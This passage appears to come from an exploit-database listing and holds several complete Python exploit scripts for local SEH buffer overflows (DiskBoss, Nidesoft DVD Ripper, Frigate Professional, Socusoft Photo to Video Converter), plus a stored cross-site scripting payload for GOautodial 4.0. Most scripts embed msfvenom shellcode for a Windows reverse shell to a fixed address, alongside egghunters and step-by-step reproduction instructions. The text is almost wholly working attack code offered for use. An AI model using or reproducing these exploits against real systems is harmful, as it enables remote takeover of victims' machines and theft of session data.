"\x42\xc8\x88\xf4\x6f\x1d\xa1\x57\xf8\xd2\x88\x67\xf8" buf += "\x7c\x9a\x14\xca\x23\x30\xb2\x66\xab\x9e\x45\x88\x86" buf += "\x67\xd9\x77\x29\x98\xf0\xb3\x7d\xc8\x6a\x15\xfe\x83" buf += "\x6a\x9a\x2b\x03\x3a\x34\x84\xe4\xea\xf4\x74\x8d\xe0" buf += "\xfa\xab\xad\x0b\xd1\xc3\x44\xf6\xb2\x2b\x30\x5c\xc3" buf += "\xc4\x43\x9c\xc5\xaf\xcd\x7a\xaf\xdf\x9b\xd5\x58\x79" buf += "\x86\xad\xf9\x86\x1c\xc8\x3a\x0c\x93\x2d\xf4\xe5\xde" buf += "\x3d\x61\x06\x95\x1f\x24\x19\x03\x37\xaa\x88\xc8\xc7" buf += 
"\xa5\xb0\x46\x90\xe2\x07\x9f\x74\x1f\x31\x09\x6a\xe2" buf += "\xa7\x72\x2e\x39\x14\x7c\xaf\xcc\x20\x5a\xbf\x08\xa8" buf += "\xe6\xeb\xc4\xff\xb0\x45\xa3\xa9\x72\x3f\x7d\x05\xdd" buf += "\xd7\xf8\x65\xde\xa1\x04\xa0\xa8\x4d\xb4\x1d\xed\x72" buf += "\x79\xca\xf9\x0b\x67\x6a\x05\xc6\x23\x9a\x4c\x4a\x05" buf += "\x33\x09\x1f\x17\x5e\xaa\xca\x54\x67\x29\xfe\x24\x9c" buf += "\x31\x8b\x21\xd8\xf5\x60\x58\x71\x90\x86\xcf\x72\xb1" exploit = "A"*420 exploit += "\x74\x06\x75\x04" # 0x10015140 pop pop ret; SDL.dll exploit += "\x40\x51\x01\x10" exploit += "\x41"*(2000-428-len(buf)) exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()
  16. # Exploit Title: DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) # Date: 2020-07-26 # Exploit Author: MasterVlad # Vendor Homepage: https://www.diskboss.com/ # Software Link: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe # Version: 7.7.14 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 32-bit # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open diskbsg.exe and go to Tools -> DiskBoss Options # 4. Go to Advanced and paste the clipboard into the "Reports and Data Directory" field # 5. Click on Save button #!/usr/bin/python # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI buf = "" buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" buf += 
"\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" buf += 
"\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A" egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" exploit = "A"*4096 # 0x67031912 - pop pop ret exploit += "\x74\x06\x75\x04" exploit += "\x12\x19\x03\x67" exploit += egg exploit += "C"*(5000-4104) exploit += "T00WT00W" exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()
  17. # Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) # Date: 2020-07-26 # Author: Felipe Winsnes # Software Link: https://nidesoft-dvd-ripper.softonic.com/ # Version: 5.2.18 # Tested on: Windows 7 (x86) # Blog: https://whitecr0wz.github.io/ # Proof of Concept: # 1.- Run the python script, it will create the file "poc.txt". # 2.- Copy the content of the new file "poc.txt" to clipboard # 3.- Open the application. # 4.- Paste the clipboard into the "License Code" parameter within registration. # 5.- Profit. import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d" # Payload size: 448 bytes buf = b"" buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c" buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55" buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c" buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b" buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55" buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52" buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38" buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42" buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54" buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61" buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77" buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54" buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f" buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30" buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73" buf += b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68" buf += 
b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30" buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b" buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77" buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a" buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e" buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51" buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30" buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f" buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65" buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45" buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69" buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42" buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71" buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38" buf += b"\x53\x55\x65\x50\x41\x41" nseh = "\xEB\x11\x41\x41" seh = struct.pack("<I", 0x6678336D) # 0x6678336d : pop ebx # pop esi # ret | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_WRITECOPY} [avcodec.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Nidesoft Studio\Nidesoft DVD Ripper 5\avcodec.dll) buffer = "A" * 6008 + nseh + seh + "A" * 11 + buf + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close()
  18. # Exploit Title: Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) # Date: 2020-07-24 # Exploit Author: MasterVlad # Vendor Homepage: http://www.frigate3.com/ # Software Link: http://www.frigate3.com/download/frigate3_pro.exe # Version: 3.36.0.9 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 32-bit # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open Frigate3.exe and go to File -> Pack # 4. Paste the clipboard into the "Archive To" field and click on Ok button #!/usr/bin/python egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c" egg += "\x25\x4A\x50\x5c\x25\x4A" egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI buf = "" buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" buf += 
"\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" buf += 
"\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" exploit = "A"*4112 # 0x40012623 - pop pop ret rtl60.bpl exploit += "\x74\x06\x75\x04" exploit += "\x23\x26\x01\x40" exploit += egg exploit += "C"*(5000-4120-len(egg)) exploit += "T00WT00W" exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()
  19. # Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) # Author: Balzabu # Discovery Date: 2020-07-23 # Vendor Homepage: https://goautodial.org/ # Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html # Tested Version: 4.0 (Last release as of today) # Tested on OS: CentOS 7 # STEPS TO REPRODUCE: # 1 - Log in as an agent # 2 - Write a new message to user goadmin with: Subject: Help me, I can't connect to the webphone <script src=1 href=1 onerror="javascript:alert(document.cookies)"></script> Text: whatever you want # 3 - Send and wait for goadmin to read the message... :-)
  20. # Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) # Date: 2020-07-23 # Exploit Author: MasterVlad # Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html # Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe # Version: 8.07 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 10 x64 # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output # 4. Paste the clipboard into the 'Output Folder' field and click on Open #!/usr/bin/python # Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI buf = "" buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53" buf += "\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b" buf += "\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42" buf += "\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77" buf += "\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45" buf += "\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f" buf += "\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52" buf += "\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c" buf += "\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76" buf += "\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31" buf += "\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30" buf += "\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61" buf += 
"\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78" buf += "\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d" buf += "\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56" buf += "\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76" buf += "\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33" buf += "\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70" buf += "\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70" buf += "\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f" buf += "\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63" buf += "\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48" buf += "\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50" buf += "\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58" buf += "\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42" buf += "\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70" buf += "\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37" buf += "\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f" buf += "\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34" buf += "\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68" buf += "\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61" buf += "\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35" buf += "\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72" buf += "\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c" buf += "\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a" buf += "\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39" buf += "\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43" buf += "\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76" buf += "\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e" buf += "\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64" buf += "\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31" buf += "\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78" buf += "\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c" buf += "\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70" buf += 
"\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58" buf += "\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48" buf += "\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57" buf += "\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70" buf += "\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72" buf += "\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41" egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" exploit = "A"*304 exploit += "\x74\x06\x75\x04" # 0x10047a1e exploit += "\x1e\x7a\x04\x10" exploit += egg exploit += "B"*(2000-312-len(egg)) exploit += "T00WT00W" exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()
